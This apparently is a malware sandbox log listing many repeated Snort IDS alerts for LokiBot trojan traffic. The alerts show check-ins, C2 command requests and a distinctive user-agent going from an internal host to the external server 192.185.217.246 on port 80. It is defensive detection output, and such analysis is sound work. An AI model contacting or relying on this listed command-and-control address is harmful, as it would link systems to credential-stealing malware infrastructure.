          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49834 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49834 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49835 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49835 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49835 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49835 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49836 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49836 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49836 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49836 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49837 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49837 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49837 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49837 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49838 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49838 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49838 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49838 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49839 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49839 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49839 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49839 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49840 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49840 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49840 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49840 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49841 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49841 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49841 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49841 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49842 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49842 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49842 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49842 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49843 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49843 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49843 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49843 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49844 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49844 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49844 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49844 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49845 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49845 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49845 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49845 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49846 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49846 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49846 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49846 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49847 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49847 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49847 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49847 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49848 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49848 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49848 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49848 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49849 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49849 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49849 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49849 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49850 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49850 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49850 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49850 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49851 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49851 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49851 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49851 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49852 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49852 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49852 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49852 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49853 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49853 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49853 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49853 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49854 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49854 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49854 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49854 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49855 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49855 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49855 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49855 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49856 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49856 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49856 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49856 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49857 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49857 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49857 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49857 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49858 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49858 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49858 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49858 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49859 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49859 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49859 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49859 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49860 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49860 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49860 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49860 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49861 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49861 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49861 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49861 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49862 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49862 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49862 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49862 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49863 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49863 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49863 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49863 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49864 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49864 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49864 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49864 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49865 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49865 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49865 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49865 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49866 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49866 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49866 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49866 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49867 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49867 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49867 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49867 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49868 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49868 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49868 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49868 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49869 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49869 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49869 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49869 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49870 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49870 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49870 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49870 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49871 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49871 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49871 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49871 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49872 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49872 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49872 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49872 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49873 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49873 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49873 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49873 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49874 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49874 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49874 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49874 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49875 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49875 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49875 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49875 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49876 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49876 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49876 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49876 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49877 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49877 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49877 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49877 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49878 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49878 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49878 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49878 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49879 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49879 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49879 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49879 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49880 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49880 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49880 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49880 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49881 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49881 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49881 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49881 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49882 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49882 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49882 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49882 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49883 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49883 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49883 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49883 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49884 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49884 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49884 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49884 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49885 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49885 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49885 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49885 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49886 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49886 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49886 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49886 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49887 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49887 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49887 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49887 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.11.20:49888 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49888 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49888 -> 192.185.217.246:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.11.20:49888 -> 192.185.217.246:80
